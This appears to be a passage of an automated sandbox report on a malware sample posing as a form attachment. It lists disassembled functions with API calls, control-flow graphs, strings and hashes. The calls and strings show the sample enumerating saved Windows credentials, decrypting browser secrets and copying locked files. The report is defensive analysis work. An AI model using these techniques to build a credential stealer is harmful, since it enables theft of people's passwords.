                                                                                                              Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                              • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$FirstNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 1690352074-0
                                                                                                              • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                              • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                              • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                              • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                              Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0041898C
                                                                                                              • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InfoSystemmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3558857096-0
                                                                                                              • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                              • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                              • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                              • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                              Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004455C2
                                                                                                              • wcsrchr.MSVCRT ref: 004455DA
                                                                                                              • memset.MSVCRT ref: 0044570D
                                                                                                              • memset.MSVCRT ref: 00445725
                                                                                                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                              • memset.MSVCRT ref: 0044573D
                                                                                                              • memset.MSVCRT ref: 00445755
                                                                                                              • memset.MSVCRT ref: 004458CB
                                                                                                              • memset.MSVCRT ref: 004458E3
                                                                                                              • memset.MSVCRT ref: 0044596E
                                                                                                              • memset.MSVCRT ref: 00445A10
                                                                                                              • memset.MSVCRT ref: 00445A28
                                                                                                              • memset.MSVCRT ref: 00445AC6
                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                              • memset.MSVCRT ref: 00445B52
                                                                                                              • memset.MSVCRT ref: 00445B6A
                                                                                                              • memset.MSVCRT ref: 00445C9B
                                                                                                              • memset.MSVCRT ref: 00445CB3
                                                                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                              • memset.MSVCRT ref: 00445B82
                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                              • memset.MSVCRT ref: 00445986
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                              • API String ID: 1963886904-3798722523
                                                                                                              • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                              • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                              Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                              • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                                              • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                              • String ID: $/deleteregkey$/savelangfile
                                                                                                              • API String ID: 2744995895-28296030
                                                                                                              • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                              • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                              • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                              • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                              Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040B71C
                                                                                                                • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                              • wcsrchr.MSVCRT ref: 0040B738
                                                                                                              • memset.MSVCRT ref: 0040B756
                                                                                                              • memset.MSVCRT ref: 0040B7F5
                                                                                                              • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                              • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                              • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                              • memset.MSVCRT ref: 0040B851
                                                                                                              • memset.MSVCRT ref: 0040B8CA
                                                                                                              • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                              • memset.MSVCRT ref: 0040BB53
                                                                                                              • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                              • String ID: chp$v10
                                                                                                              • API String ID: 1297422669-2783969131
                                                                                                              • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                                                              • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                              • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                                                              • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                              Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 511 40e304-40e316 call 406e8f 510->511 516 40e476-40e483 call 406b53 511->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 511->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 529 40e497-40e49f free 524->529 529->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 551 40e3b0 542->551 552 40e3b3-40e3c1 wcschr 542->552 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 549 40e3fb-40e40c memcpy 548->549 550 40e40f-40e414 548->550 549->550 553 40e416-40e427 memcpy 550->553 554 40e42a-40e42f 550->554 551->552 552->541 555 40e3c3-40e3c6 552->555 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                              APIs
                                                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                              • free.MSVCRT ref: 0040E49A
                                                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                              • memset.MSVCRT ref: 0040E380
                                                                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                              • wcschr.MSVCRT ref: 0040E3B8
                                                                                                              • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,771B2EE0), ref: 0040E3EC
                                                                                                              • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,771B2EE0), ref: 0040E407
                                                                                                              • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,771B2EE0), ref: 0040E422
                                                                                                              • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,771B2EE0), ref: 0040E43D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                              • API String ID: 3849927982-2252543386
                                                                                                              • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                              • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                              • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                              • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                              Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 602 4094f7-4094fa call 424f26 598->602 600->567 602->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 617 4093e4-4093fb call 4253af * 2 613->617 615 4092bc 614->615 616 4092be-4092e3 memcpy memcmp 614->616 615->616 618 409333-409345 memcmp 616->618 619 4092e5-4092ec 616->619 617->602 627 409401-409403 617->627 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->602 628 409409-40941b memcmp 627->628 628->602 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->602 633 4094b8-4094ed memcpy * 2 630->633 631->602 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->602
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004091E2
                                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                              • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                              • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                              • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                              • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                              • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3715365532-3916222277
                                                                                                              • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                              • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                              Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                              • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
